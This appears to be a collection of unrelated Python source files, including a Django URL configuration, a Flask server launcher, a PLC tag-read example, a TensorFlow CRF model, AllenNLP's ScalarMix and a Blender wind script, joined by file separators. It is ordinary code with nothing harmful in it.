4.327893 , 3.985085 , 3.678286 , 3.335367 , 2.953589 ,
2.57246 , 2.217582 , 1.889313 , 1.586384 , 1.319205 ,
1.117156 , 1.004066 , 0.9006934 , 0.7929348 , 0.6598114 ,
0.5608037 , 0.5221579 , 0.4566192 , 0.3826315 , 0.3151257 ,
0.2497519 , 0.1938919 , 0.161567 , 0.1437669 , 0.1241348 ,
0.09875807, 0.08337688, 0.07254977, 0.06489109, 0.06011635,
0.0572758 , 0.05523301, 0.05391805, 0.05260935, 0.05118826,
0.04970942, 0.04921116, 0.04938217, 0.04948469, 0.04887103,
0.0496528 , 0.05139117, 0.05410789, 0.05309466, 0.05165747,
0.0498389 , 0.04871117, 0.04829424, 0.04853613, 0.04912888,
0.04907085, 0.0484611 , 0.04731189, 0.04690288, 0.04737696,
0.0483425 , 0.04885881, 0.04753838, 0.04404007, 0.0405377 ,
0.03945616, 0.04006498, 0.03954044, 0.03722645, 0.03488482,
0.03295968, 0.02738151, 0.02086214, 0.02086658, 0.02087084,
0.02087493])
self["CH4"] = numpy.array([ 0.00907582, 0.00907582, 0.07173381, 0.1168504 , 0.1393494 ,
0.1532193 , 0.1714531 , 0.1907549 , 0.2226026 , 0.2802003 ,
0.3650427 , 0.4563802 , 0.5494887 , 0.6393934 , 0.7256052 ,
0.8122181 , 0.9008319 , 0.9992386 , 1.092925 , 1.184485 ,
1.271705 , 1.344764 , 1.409534 , 1.471594 , 1.516804 ,
1.558394 , 1.598414 , 1.620794 , 1.637004 , 1.637534 ,
1.638104 , 1.638704 , 1.639354 , 1.635034 , 1.630864 ,
1.626924 , 1.623304 , 1.620094 , 1.624864 , 1.629904 ,
1.635204 , 1.640764 , 1.646614 , 1.680853 , 1.691653 ,
1.702943 , 1.710403 , 1.714873 , 1.719423 , 1.723453 ,
1.727652 , 1.729941 , 1.731429 , 1.732867 , 1.734094 ,
1.735358 , 1.73741 , 1.739609 , 1.741511 , 1.743156 ,
1.744602 , 1.745187 , 1.74578 , 1.745269 , 1.74462 ,
1.743181 , 1.741222 , 1.739449 , 1.738058 , 1.736819 ,
1.736406 , 1.735898 , 1.735642 , 1.735413 , 1.735316 ,
1.735308 , 1.735469 , 1.735556 , 1.735436 , 1.735492 ,
1.735344 , 1.735097 , 1.734644 , 1.734111 , 1.733554 ,
1.733122 , 1.732716 , 1.732248 , 1.73171 , 1.730099 ,
1.727667 , 1.725943 , 1.724649 , 1.723625 , 1.721685 ,
1.719006 , 1.718802 , 1.717547 , 1.717893 , 1.718243 ,
1.71858 ])
self["CTP"] = 500.0
self["CFRACTION"] = 0.0
self["IDG"] = 0
self["ISH"] = 0
self["ELEVATION"] = 0.0
self["S2M"]["T"] = 279.876
self["S2M"]["Q"] = 7152.01027939
self["S2M"]["O"] = 0.0208749268383
self["S2M"]["P"] = 1007.99701
self["S2M"]["U"] = 0.0
self["S2M"]["V"] = 0.0
self["S2M"]["WFETC"] = 100000.0
self["SKIN"]["SURFTYPE"] = 1
self["SKIN"]["WATERTYPE"] = 1
self["SKIN"]["T"] = 279.876
self["SKIN"]["SALINITY"] = 35.0
self["SKIN"]["FOAM_FRACTION"] = 0.0
self["SKIN"]["FASTEM"] = numpy.array([ 3. , 5. , 15. , 0.1, 0.3])
self["ZENANGLE"] = 0.0
self["AZANGLE"] = 0.0
self["SUNZENANGLE"] = 0.0
self["SUNAZANGLE"] = 0.0
self["LATITUDE"] = -50.931
self["GAS_UNITS"] = 2
self["BE"] = 0.0
self["COSBK"] = 0.0
self["DATE"] = numpy.array([2007, 6, 10])
self["TIME"] = numpy.array([0, 0, 0])
|
python
|
"""
Outpost URL Configuration
"""
import django
from django.conf import settings
from django.conf.urls import include, url
from django.contrib import admin
from django.views.static import serve
from django.views.i18n import JavaScriptCatalog
from rest_framework.authtoken import views as authtoken
js_info_dict = {
'packages': ('recurrence', ),
}
urlpatterns = []
if settings.DEBUG:
import debug_toolbar
urlpatterns.extend(
[
url(r"^media/(?P<path>.*)$", serve, {"document_root": settings.MEDIA_ROOT}),
url(
r"^static/(?P<path>.*)$", serve, {"document_root": settings.STATIC_ROOT}
),
]
)
urlpatterns.extend([url(r"^__debug__/", include(debug_toolbar.urls))])
urlpatterns.extend(
[
url(r"^admin/", admin.site.urls),
url(r'^jsi18n/$', JavaScriptCatalog.as_view(), js_info_dict),
url(r"^auth/api/", include("rest_framework.urls", namespace="rest_framework")),
url(r"^prometheus/", include("django_prometheus.urls")),
url(r"^auth/token/", authtoken.obtain_auth_token),
url(
r"^saml2/",
include(
("djangosaml2.urls", "saml2")
if django.VERSION >= (2, 1)
else "djangosaml2.urls",
namespace="saml2",
),
),
url(
r"^oauth2/",
include(
("outpost.django.oauth2.urls", "oauth2")
if django.VERSION >= (2, 1)
else "outpost.django.oauth2.urls",
namespace="oauth2",
),
),
url(r"^lti/", include("outpost.django.lti.urls", namespace="lti")),
url(
r"^attendance/",
include("outpost.django.attendance.urls", namespace="attendance"),
),
url(
r"^research/",
include("outpost.django.research.urls", namespace="research"),
),
url(
r"^campusonline/",
include("outpost.django.campusonline.urls", namespace="campusonline"),
),
url(
r"^networktoken/",
include("outpost.django.networktoken.urls", namespace="networktoken"),
),
url(r"^salt/", include("outpost.django.salt.urls", namespace="salt")),
url(r"^typo3/", include("outpost.django.typo3.urls", namespace="typo3")),
url(r"^borg/", include("outpost.django.borg.urls", namespace="borg")),
url(r"^video/", include("outpost.django.video.urls", namespace="video")),
url(
r"^redirect/", include("outpost.django.redirect.urls", namespace="redirect")
),
url(r"^", include("outpost.django.api.urls", namespace="api")),
url(
r"^",
include(("django.contrib.auth.urls", "accounts"), namespace="accounts"),
),
url(r"^", include("outpost.django.base.urls", namespace="base")),
]
)
|
python
|
import argparse
from flatdb import flatdb_app
from flatdb.app import define_urls
def get_options():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--debug', action='store_true', default=False)
parser.add_argument('-p', '--port', type=int, default=7532)
parser.add_argument('-b', '--database')
parser.add_argument('-H', '--host', default='127.0.0.1')
return parser.parse_args()
def configure_app(app, options):
app.config['DB'] = options.database
define_urls(app)
def dev_server():
options = get_options()
configure_app(flatdb_app, options)
flatdb_app.run(debug=options.debug, port=options.port, host=options.host)
def run_server():
options = get_options()
configure_app(flatdb_app, options)
from gevent.pywsgi import WSGIServer
server = WSGIServer((options.host, options.port), flatdb_app)
server.serve_forever()
if __name__ == '__main__':
run_server()
|
python
|
'''
the following import is only necessary because eip is not in this directory
'''
import sys
sys.path.append('..')
'''
The simplest example of reading a tag from a PLC
NOTE: You only need to call .Close() after you are done exchanging
data with the PLC. If you were going to read in a loop or read
more tags, you wouldn't want to call .Close() every time.
'''
from pylogix import PLC
comm = PLC()
comm.IPAddress = '192.168.1.9'
ret = comm.Read('CurrentScreen')
print(ret.value)
comm.Close()
|
python
|
from __future__ import unicode_literals
import frappe
from frappe.model.utils.rename_field import rename_field
def execute():
frappe.reload_doc("accounts", "doctype", "pricing_rule")
try:
rename_field("Pricing Rule", "price_or_discount", "rate_or_discount")
rename_field("Pricing Rule", "price", "rate")
except Exception as e:
if e.args[0]!=1054:
raise
|
python
|
import logging
import os
import requests
import pickle
import json
from configparser import ConfigParser
logger = logging.getLogger(__name__)
project_dir = os.path.abspath(os.path.dirname(__file__)) + '/'
config = ConfigParser()
config.read(project_dir + '/config.cfg')
def get_or_download_file(filename, k, value, config):
folder_path = f'{project_dir}/' + config.get(k, value)
file_path = f'{folder_path}/{filename}'
if not os.path.exists(folder_path):
logger.warning('mkdir: %s', folder_path)
os.makedirs(folder_path)
if not os.path.exists(file_path):
logger.warning('downloading data file to: %s', file_path)
url = 'https://bioseed.mcs.anl.gov/~fxliu/modelseedpy/' + filename
r = requests.get(url, allow_redirects=True)
with open(file_path, 'wb') as fh:
fh.write(r.content)
return file_path
def get_file(filename, k, value):
return get_or_download_file(filename, k, value, config)
def get_classifier(classifier_id):
from modelseedpy.core.msgenomeclassifier import MSGenomeClassifier
cls_pickle = get_file(f'{classifier_id}.pickle', 'data', 'classifier_folder')
cls_features = get_file(f'{classifier_id}_features.json', 'data', 'classifier_folder')
with open(cls_pickle, 'rb') as fh:
model_filter = pickle.load(fh)
with open(cls_features, 'r') as fh:
features = json.load(fh)
return MSGenomeClassifier(model_filter, features)
def get_template(template_id):
# we need a mstemplate object!
template_file = get_file(f'{template_id}.json', 'data', 'template_folder')
with open(template_file, 'r') as fh:
return json.load(fh)
|
python
|
from collections import namedtuple
Point = namedtuple('point', 'x, y')
mouse_pos = Point(100, 200)
print("X Position of Mouse:", mouse_pos.x)
|
python
|
import json
from graphql_relay import to_global_id
from tracker.api.services.auth import (
generate_auth_token,
)
from tracker.api.status_codes import StatusEnum
async def test_create_role_mutation(
client,
setup_project_list_test_retrun_auth_token
):
pm_auth_token = setup_project_list_test_retrun_auth_token
app = client.server.app
auth_token = generate_auth_token(app['config'], user_id=2)
query = '''
mutation RoleCreationMutation($input: RoleCreationInput!) {
role {
roleCreation(input: $input) {
roleCreationPayload {
duplicatedEmailList
status
errorList
}
}
}
}
'''
variables = {
'input': {
'projectId': to_global_id('ProjectType', 1),
'role': 'team_member',
'emailList': ['[email protected]', '[email protected]'],
}
}
# with no pm token
response = await client.post(
'/graphql',
data=json.dumps({
'query': query,
'variables': json.dumps(variables),
}),
headers={
'content-type': 'application/json',
'Authorization': f'Bearer {auth_token}'
},
)
# if something will go wrong there will be response body output
print(await response.text())
assert response.status == 200
data = await response.json()
assert data['errors'][0]['status'] == StatusEnum.FORBIDDEN._name_
# with invalid project id
variables = {
'input': {
'projectId': to_global_id('ProjectType', 99999),
'role': 'team_member',
'emailList': ['[email protected]', '[email protected]'],
}
}
response = await client.post(
'/graphql',
data=json.dumps({
'query': query,
'variables': json.dumps(variables),
}),
headers={
'content-type': 'application/json',
'Authorization': f'Bearer {pm_auth_token}'
},
)
# if something will go wrong there will be response body output
print(await response.text())
assert response.status == 200
data = await response.json()
assert data['errors'][0]['status'] == StatusEnum.FORBIDDEN._name_
|
python
|
import pandas as pd
from .taxa_tree import NCBITaxaTree
from ..constants import MICROBE_DIR
MICROBE_DIR_COLS = [
'gram_stain',
'microbiome_location',
'antimicrobial_susceptibility',
'optimal_temperature',
'extreme_environment',
'biofilm_forming',
'optimal_ph',
'animal_pathogen',
'spore_forming',
'pathogenicity',
'plant_pathogen'
]
def annotate_taxa(taxa):
"""Return a pandas dataframe with annotations for the given taxa."""
taxa_tree = NCBITaxaTree.parse_files()
phyla = [taxa_tree.phyla(taxon, 'unknown') for taxon in taxa]
annotated = pd.DataFrame.from_dict({'taxa': taxa, 'phyla': phyla}, orient='columns')
annotated = annotated.set_index('taxa')
microbe_dir = pd.read_csv(MICROBE_DIR).set_index('species')
annotated = annotated.join(microbe_dir[MICROBE_DIR_COLS], how='left')
return annotated
|
python
|
import json
import os
from django.apps import apps
DJANGO_TAILWIND_APP_DIR = os.path.dirname(__file__)
def get_app_path(app_name):
app_label = app_name.split(".")[-1]
return apps.get_app_config(app_label).path
def get_tailwind_src_path(app_name):
return os.path.join(get_app_path(app_name), "static_src")
def get_package_json_path(app_name):
return os.path.join(get_app_path(app_name), "static_src", "package.json")
def get_package_json_contents(app_name):
with open(get_package_json_path(app_name), "r") as f:
return json.load(f)
def is_path_absolute(path):
return path.startswith("/") or path.startswith("http")
|
python
|
from model_defs import *
from utils import *
from tensorflow.models.rnn.rnn_cell import *
###################################
# Building blocks #
###################################
# takes features and outputs potentials
def potentials_layer(in_layer, mask, config, params, reuse=False, name='Potentials'):
batch_size = int(in_layer.get_shape()[0])
num_steps = int(in_layer.get_shape()[1])
input_size = int(in_layer.get_shape()[2])
pot_shape = [config.n_tags] * config.pot_window
out_shape = [batch_size, num_steps] + pot_shape
#~ pot_size = config.n_tags ** config.pot_window
#~ if reuse:
#~ tf.get_variable_scope().reuse_variables()
#~ W_pot = params.W_pot
#~ b_pot = params.b_pot
#~ else:
#~ W_pot = weight_variable([input_size, pot_size], name=name)
#~ b_pot = bias_variable([pot_size], name=name)
#~ flat_input = tf.reshape(in_layer, [-1, input_size])
#~ pre_scores = tf.matmul(flat_input, W_pot) + b_pot
# BOGUS
W_pot = False
b_pot = False
reshaped_in = tf.reshape(in_layer, [batch_size, num_steps, config.pot_window, -1])
pre_scores = tf.reduce_sum(reshaped_in, 2)
# /BOGUS
pots_layer = tf.reshape(pre_scores, out_shape)
# define potentials for padding tokens
padding_pot = np.zeros(pot_shape)
num = config.pot_window / 2
idx = [slice(None)] * num + [0] + [slice(None)] * num
padding_pot[idx] += 10000
pad_pot = tf.convert_to_tensor(padding_pot, tf.float32)
pad_pots = tf.expand_dims(tf.expand_dims(pad_pot, 0), 0)
pad_pots = tf.tile(pad_pots, [batch_size, num_steps] + [1] * config.pot_window)
# expand mask
mask_a = mask
for _ in range(config.pot_window):
mask_a = tf.expand_dims(mask_a, -1)
mask_a = tf.tile(mask_a, [1, 1] + pot_shape)
# combine
pots_layer = (pots_layer * mask_a + (1 - mask_a) * pad_pots)
return (pots_layer, W_pot, b_pot)
# pseudo-likelihood criterion
def pseudo_likelihood(potentials, pot_indices, targets, config):
batch_size = int(potentials.get_shape()[0])
num_steps = int(potentials.get_shape()[1])
pots_shape = map(int, potentials.get_shape()[2:])
# move the current tag to the last dimension
perm = range(len(potentials.get_shape()))
mid = config.pot_window / 2
perm[-1] = perm[-mid - 1]
for i in range(-1, mid -1):
perm[-mid + i] = perm[-mid + i] + 1
perm_potentials = tf.transpose(potentials, perm=perm)
# get conditional distribution of the current tag
flat_pots = tf.reshape(perm_potentials, [-1, config.n_tags])
flat_cond = tf.gather(flat_pots, pot_indices)
pre_cond = tf.nn.softmax(flat_cond)
conditional = tf.reshape(pre_cond, [batch_size, num_steps, -1])
# compute pseudo-log-likelihood of sequence
p_ll = tf.reduce_sum(targets * tf.log(conditional))
return (conditional, p_ll)
# dynamic programming part 1: max sum
class CRFMaxCell(RNNCell):
"""Dynamic programming for CRF"""
def __init__(self, config):
self._num_units = config.n_tags ** (config.pot_window - 1)
self.n_tags = config.n_tags
@property
def input_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
"""Summation for dynamic programming. Inputs are the
log-potentials. States are the results of the summation at the
last step"""
with tf.variable_scope(scope or type(self).__name__):
# add states and log-potentials
multiples = [1] * (len(state.get_shape()) + 1)
multiples[-1] = self.n_tags
exp_state = tf.tile(tf.expand_dims(state, -1), multiples)
added = exp_state + inputs
# return maxes, arg_maxes along first dimension (after the batch dim)
new_state = tf.reduce_max(added, 1)
max_id = tf.argmax(added, 1)
return new_state, max_id
# max a posteriori tags assignment: implement dynamic programming
def map_assignment(potentials, config):
batch_size = int(potentials.get_shape()[0])
num_steps = int(potentials.get_shape()[1])
pots_shape = map(int, potentials.get_shape()[2:])
inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
for x in tf.split(1, num_steps, potentials)]
# forward pass
max_cell = CRFMaxCell(config)
max_ids = [0] * len(inputs_list)
# initial state: starts at 0 - 0 - 0 etc...
state = tf.zeros(pots_shape[:-1])
for t, input_ in enumerate(inputs_list):
state, max_id = max_cell(inputs_list[t], state)
max_ids[t] = max_id
# backward pass
powers = tf.to_int64(map(float, range(batch_size))) * \
(config.n_tags ** (config.pot_window - 1))
outputs = [-1] * len(inputs_list)
best_end = tf.argmax(tf.reshape(state, [batch_size, -1]), 1)
current = best_end
mid = config.pot_window / 2
max_pow = (config.n_tags ** mid)
for i, _ in enumerate(outputs):
outputs[-1 - i] = (current / max_pow)
prev_best = tf.gather(tf.reshape(max_ids[-1 - i], [-1]), current + powers)
current = prev_best * max_pow + (current / config.n_tags)
map_tags = tf.transpose(tf.pack(outputs))
return map_tags
# dynamic programming part 2: sum product
class CRFSumCell(RNNCell):
"""Dynamic programming for CRF"""
def __init__(self, config):
self._num_units = config.n_tags ** (config.pot_window - 1)
self.n_tags = config.n_tags
@property
def input_size(self):
return self._num_units
@property
def output_size(self):
return self._num_units
@property
def state_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None):
"""Summation for dynamic programming. Inputs are the
log-potentials. States are the results of the summation at the
last step"""
with tf.variable_scope(scope or type(self).__name__):
# add states and log-potentials
multiples = [1] * (len(state.get_shape()) + 1)
multiples[-1] = self.n_tags
exp_state = tf.tile(tf.expand_dims(state, -1), multiples)
added = exp_state + inputs
# log-sum along first dimension (after the batch dim)
max_val = tf.reduce_max(added)
added_exp = tf.exp(added - max_val)
summed_exp = tf.reduce_sum(added_exp, 1)
new_state = tf.log(summed_exp) + max_val
return new_state
# computing the log partition for a sequence of length config.num_steps
def log_partition(potentials, config):
batch_size = int(potentials.get_shape()[0])
num_steps = int(potentials.get_shape()[1])
pots_shape = map(int, potentials.get_shape()[2:])
inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
for x in tf.split(1, num_steps, potentials)]
# forward pass
sum_cell = CRFSumCell(config)
state = tf.zeros([batch_size] + pots_shape[:-1])
partial_sums = [0] * len(inputs_list)
for t, input_ in enumerate(inputs_list):
state = sum_cell(inputs_list[t], state)
partial_sums[t] = state
# sum at the end
max_val = tf.reduce_max(state)
state_exp = tf.exp(state - max_val)
log_part = tf.log(tf.reduce_sum(tf.reshape(state_exp, [batch_size, -1]), 1)) + max_val
return tf.reduce_sum(log_part)
# compute the log to get the log-likelihood
def log_score(potentials, window_indices, mask, config):
batch_size = int(potentials.get_shape()[0])
num_steps = int(potentials.get_shape()[1])
pots_shape = map(int, potentials.get_shape()[2:])
flat_pots = tf.reshape(potentials, [-1])
flat_scores = tf.gather(flat_pots, window_indices)
scores = tf.reshape(flat_scores, [batch_size, num_steps])
scores = tf.mul(scores, mask)
return tf.reduce_sum(scores)
# TODO: alpha-beta rec
def marginals(potentials, config):
batch_size = int(potentials.get_shape()[0])
num_steps = int(potentials.get_shape()[1])
pots_shape = map(int, potentials.get_shape()[2:])
inputs_list = [tf.reshape(x, [batch_size] + pots_shape)
for x in tf.split(1, num_steps, potentials)]
# forward and backwar pass
sum_cell_f = CRFSumCell(config)
sum_cell_b = CRFSumCell(config)
state_f = tf.convert_to_tensor(np.zeros(pots_shape[:-1]))
state_b = tf.convert_to_tensor(np.zeros(pots_shape[:-1]))
partial_sums_f = [0] * len(inputs_list)
partial_sums_b = [0] * len(inputs_list)
for t, _ in enumerate(inputs_list):
state_f = sum_cell_f(inputs_list[t], state_f)
partial_sums_f[t] = state_f
state_b = sum_cell_b(inputs_list[t], state_b)
partial_sums_b[-1 - t] = state_b
# TODO: compute marginals
marginals = 0
return marginals
###################################
# Making a (deep) CRF #
###################################
class CRF:
def __init__(self, config):
self.batch_size = config.batch_size
self.num_steps = config.num_steps
num_features = len(config.input_features)
# input_ids <- batch.features
self.input_ids = tf.placeholder(tf.int32, shape=[self.batch_size,
self.num_steps,
num_features])
# mask <- batch.mask
self.mask = tf.placeholder(tf.float32, [self.batch_size, self.num_steps])
# pot_indices <- batch.tag_neighbours_lin
self.pot_indices = tf.placeholder(tf.int32,
[config.batch_size * config.num_steps])
# targets <- batch.tags_one_hot
self.targets = tf.placeholder(tf.float32, [config.batch_size,
config.num_steps,
config.n_tags])
# window_indices <- batch.tag_windows_lin
self.window_indices = tf.placeholder(tf.int32,
[config.batch_size * config.num_steps])
def make(self, config, params, reuse=False, name='CRF'):
# TODO: add marginal inference
with tf.variable_scope(name):
if reuse:
tf.get_variable_scope().reuse_variables()
# out_layer <- output of NN (TODO: add layers)
(out_layer, embeddings) = feature_layer(self.input_ids,
config, params,
reuse=reuse)
params.embeddings = embeddings
if config.verbose:
print('features layer done')
self.out_layer = out_layer
# pots_layer <- potentials
(pots_layer, W_pot, b_pot) = potentials_layer(out_layer,
self.mask,
config, params,
reuse=reuse)
params.W_pot = W_pot
params.b_pot = b_pot
if config.verbose:
print('potentials layer done')
self.pots_layer = pots_layer
# pseudo-log-likelihood
conditional, pseudo_ll = pseudo_likelihood(pots_layer,
self.pot_indices,
self.targets, config)
self.pseudo_ll = pseudo_ll
# accuracy of p(t_i | t_{i-1}, t_{i+1})
correct_cond_pred = tf.equal(tf.argmax(conditional, 2), tf.argmax(self.targets, 2))
correct_cond_pred = tf.cast(correct_cond_pred,"float")
cond_accuracy = tf.reduce_sum(correct_cond_pred * tf.reduce_sum(self.targets, 2)) /\
tf.reduce_sum(self.targets)
self.cond_accuracy = cond_accuracy
# log-likelihood
log_sc = log_score(self.pots_layer, self.window_indices,
self.mask, config)
log_part = log_partition(self.pots_layer, config)
log_likelihood = log_sc - log_part
self.log_likelihood = log_likelihood
# L1 regularization
self.l1_norm = tf.reduce_sum(tf.zeros([1]))
for feat in config.l1_list:
self.l1_norm += config.l1_reg * \
tf.reduce_sum(tf.abs(params.embeddings[feat]))
# L2 regularization
self.l2_norm = tf.reduce_sum(tf.zeros([1]))
for feat in config.l2_list:
self.l2_norm += config.l2_reg * \
tf.reduce_sum(tf.mul(params.embeddings[feat],
params.embeddings[feat]))
# map assignment and accuracy of map assignment
map_tags = map_assignment(self.pots_layer, config)
correct_pred = tf.equal(map_tags, tf.argmax(self.targets, 2))
correct_pred = tf.cast(correct_pred,"float")
accuracy = tf.reduce_sum(correct_pred * tf.reduce_sum(self.targets, 2)) /\
tf.reduce_sum(self.targets)
self.map_tags = map_tags
self.accuracy = accuracy
def train_epoch(self, data, config, params, session, crit_type='likelihood'):
batch_size = config.batch_size
criterion = None
if crit_type == 'pseudo':
criterion = -self.pseudo_ll
else:
criterion = -self.log_likelihood
criterion -= config.l1_reg * self.l1_norm + config.l1_reg * self.l2_norm
train_step = tf.train.AdagradOptimizer(config.learning_rate).minimize(criterion)
session.run(tf.initialize_all_variables())
# TODO: gradient clipping
total_crit = 0.
n_batches = len(data) / batch_size
batch = Batch()
for i in range(n_batches):
batch.read(data, i * batch_size, config)
f_dict = {self.input_ids: batch.features,
self.pot_indices: batch.tag_neighbours_lin,
self.window_indices: batch.tag_windows_lin,
self.mask: batch.mask,
self.targets: batch.tags_one_hot}
train_step.run(feed_dict=f_dict)
crit = criterion.eval(feed_dict=f_dict)
total_crit += crit
if i % 50 == 0:
train_accuracy = self.accuracy.eval(feed_dict=f_dict)
print i, n_batches, train_accuracy, crit
print("step %d of %d, training accuracy %f, criterion %f" %
(i, n_batches, train_accuracy, crit))
print 'total crit', total_crit / n_batches
return total_crit / n_batches
def validate_accuracy(self, data, config):
batch_size = config.batch_size
batch = Batch()
total_accuracy = 0.
total_cond_accuracy = 0.
total = 0.
for i in range(len(data) / batch_size):
batch.read(data, i * batch_size, config)
f_dict = {self.input_ids: batch.features,
self.targets: batch.tags_one_hot,
self.pot_indices: batch.tag_neighbours_lin}
dev_accuracy = self.accuracy.eval(feed_dict=f_dict)
dev_cond_accuracy = self.cond_accuracy.eval(feed_dict=f_dict)
pll = self.pseudo_ll.eval(feed_dict=f_dict)
ll = self.log_likelihood.eval(feed_dict=f_dict)
total_accuracy += dev_accuracy
total_cond_accuracy += dev_cond_accuracy
total_pll += pll
total_ll += ll
total += 1
if i % 100 == 0:
print("%d of %d: \t map accuracy: %f \t cond accuracy: %f \
\t pseudo_ll: %f \t log_likelihood: %f" % (i, len(data) / batch_size,
total_accuracy / total,
total_cond_accuracy / total))
return (total_accuracy / total, total_cond_accuracy / total)
|
python
|
import networkx as nx
import numpy as np
import torch
from gym_ds3.envs.core.node import Node
from gym_ds3.envs.utils.helper_dict import OrderedSet
class JobDAG(object):
def __init__(self, job):
self.job = job
self.jobID = self.job.task_list[0].jobID
self.commvol = self.job.comm_vol
self.tasks = self.job.task_list
self.adj_mat = self.get_adj_mat(self.tasks)
self.arrived = False # dag is arrived
self.is_completed = False
self.is_running = False
self.start_exec_time = np.inf # dag start time
self.start_inject_time = np.inf # dag inject time
self.completion_time = np.inf # dag finish time
# Dependency graph (num_tasks, num_tasks)
self.predecessor = self.predecessors(self.tasks)
# The features of Node : jobID, taskID, status, deadline, start time, finish time, est
self.nodes = self.get_nodes(self.tasks, self.adj_mat)
self.num_nodes = len(self.job.task_list)
self.frontier_nodes = OrderedSet()
for node in self.nodes:
if node.is_schedulable():
self.frontier_nodes.add(node)
def get_adj_mat(self, tasks):
adj = nx.DiGraph(self.commvol)
adj.remove_edges_from(
# Remove all edges with weight of 0 since we have no placeholder for "this edge doesn't exist"
[edge for edge in adj.edges() if adj.get_edge_data(*edge)['weight'] == '0.0']
)
nx.relabel_nodes(adj, lambda idx: idx, copy=False)
adj = from_networkx(adj)
mat = np.zeros((len(tasks), len(tasks)))
index_list = adj['edge_index'].transpose(0, 1) # .T does not work with pytorch > v1.1
for i in range(len(index_list)):
mat[index_list[i][0]][index_list[i][1]] = 1
return mat
def get_nodes(self, tasks, adj_mat):
nodes = [Node(task) for task in tasks]
for i in range(len(tasks)):
for j in range(len(tasks)):
if adj_mat[i, j] == 1:
nodes[i].child_nodes.append(nodes[j])
nodes[j].parent_nodes.append(nodes[i])
return nodes
def predecessors(self, tasks):
dependency = np.zeros((len(tasks), len(tasks)))
for idx, node in enumerate(tasks):
for predecessorNode in node.predecessors:
dependency[idx][predecessorNode % len(tasks)] = 1.
return dependency
# Modified from https://github.com/rusty1s/pytorch_geometric/blob/e6b8d6427ad930c6117298006d7eebea0a37ceac/torch_geometric/utils/convert.py#L108
def from_networkx(G):
r"""Converts a :obj:`networkx.Graph` or :obj:`networkx.DiGraph` to a
:class:`torch_geometric.data.Data` instance.
Args:
G (networkx.Graph or networkx.DiGraph): A networkx graph.
"""
G = nx.convert_node_labels_to_integers(G)
G = G.to_directed() if not nx.is_directed(G) else G
edge_index = torch.LongTensor(list(G.edges)).t().contiguous()
data = {}
for i, (_, feat_dict) in enumerate(G.nodes(data=True)):
for key, value in feat_dict.items():
data[str(key)] = [value] if i == 0 else data[str(key)] + [value]
for i, (_, _, feat_dict) in enumerate(G.edges(data=True)):
for key, value in feat_dict.items():
data[str(key)] = [value] if i == 0 else data[str(key)] + [value]
for key, item in data.items():
try:
data[key] = torch.tensor(item)
except ValueError:
pass
data['edge_index'] = edge_index.view(2, -1)
data['num_nodes'] = G.number_of_nodes()
return data
|
python
|
from typing import List
import torch
from torch.nn import ParameterList, Parameter
from allennlp.common.checks import ConfigurationError
class ScalarMix(torch.nn.Module):
"""
Computes a parameterised scalar mixture of N tensors, `mixture = gamma * sum(s_k * tensor_k)`
where `s = softmax(w)`, with `w` and `gamma` scalar parameters.
In addition, if `do_layer_norm=True` then apply layer normalization to each tensor
before weighting.
"""
def __init__(
self,
mixture_size: int,
do_layer_norm: bool = False,
initial_scalar_parameters: List[float] = None,
trainable: bool = True,
) -> None:
super().__init__()
self.mixture_size = mixture_size
self.do_layer_norm = do_layer_norm
if initial_scalar_parameters is None:
initial_scalar_parameters = [0.0] * mixture_size
elif len(initial_scalar_parameters) != mixture_size:
raise ConfigurationError(
"Length of initial_scalar_parameters {} differs "
"from mixture_size {}".format(initial_scalar_parameters, mixture_size)
)
self.scalar_parameters = ParameterList(
[
Parameter(
torch.FloatTensor([initial_scalar_parameters[i]]), requires_grad=trainable
)
for i in range(mixture_size)
]
)
self.gamma = Parameter(torch.FloatTensor([1.0]), requires_grad=trainable)
def forward(self, tensors: List[torch.Tensor], mask: torch.BoolTensor = None) -> torch.Tensor:
"""
Compute a weighted average of the `tensors`. The input tensors an be any shape
with at least two dimensions, but must all be the same shape.
When `do_layer_norm=True`, the `mask` is required input. If the `tensors` are
dimensioned `(dim_0, ..., dim_{n-1}, dim_n)`, then the `mask` is dimensioned
`(dim_0, ..., dim_{n-1})`, as in the typical case with `tensors` of shape
`(batch_size, timesteps, dim)` and `mask` of shape `(batch_size, timesteps)`.
When `do_layer_norm=False` the `mask` is ignored.
"""
if len(tensors) != self.mixture_size:
raise ConfigurationError(
"{} tensors were passed, but the module was initialized to "
"mix {} tensors.".format(len(tensors), self.mixture_size)
)
def _do_layer_norm(tensor, broadcast_mask, num_elements_not_masked):
tensor_masked = tensor * broadcast_mask
mean = torch.sum(tensor_masked) / num_elements_not_masked
variance = (
torch.sum(((tensor_masked - mean) * broadcast_mask) ** 2) / num_elements_not_masked
)
return (tensor - mean) / torch.sqrt(variance + 1e-12)
normed_weights = torch.nn.functional.softmax(
torch.cat([parameter for parameter in self.scalar_parameters]), dim=0
)
normed_weights = torch.split(normed_weights, split_size_or_sections=1)
if not self.do_layer_norm:
pieces = []
for weight, tensor in zip(normed_weights, tensors):
pieces.append(weight * tensor)
return self.gamma * sum(pieces)
else:
broadcast_mask = mask.unsqueeze(-1)
input_dim = tensors[0].size(-1)
num_elements_not_masked = torch.sum(mask) * input_dim
pieces = []
for weight, tensor in zip(normed_weights, tensors):
pieces.append(
weight * _do_layer_norm(tensor, broadcast_mask, num_elements_not_masked)
)
return self.gamma * sum(pieces)
|
python
|
import bpy,bmesh
import time,copy,mathutils,math
from mathutils import noise
Context={
"lasttick":0,
"running":False,
"store":{},
"starttime":-1
}
def timeNow():
t=time.time()
return t
def calcFrameTime():
fps = max(1.0, float(bpy.context.scene.render.fps))
return 1.0/fps
def wind(v,co,col,noiseAmmount,timeN):
pos=list(co)
distorsion=1.0
noisec=[pos[0]+timeN,
pos[2]+timeN,
0]
windNoise=[0,0,0]
windNoise[0]=mathutils.noise.noise(noisec)
noisec[2]=1000
windNoise[1]=mathutils.noise.noise(noisec)
noisec[2]=9000
windNoise[2]=mathutils.noise.noise(noisec)
vcolor=(1,1,1,1)
if col:
vcolor=col
pos[2] += math.sin(timeN*20) * vcolor[3] * noiseAmmount[2] * vcolor[0] * windNoise[1]
pos[2] += math.sin(timeN*15) * vcolor[3] * noiseAmmount[2] * vcolor[1] * windNoise[1]
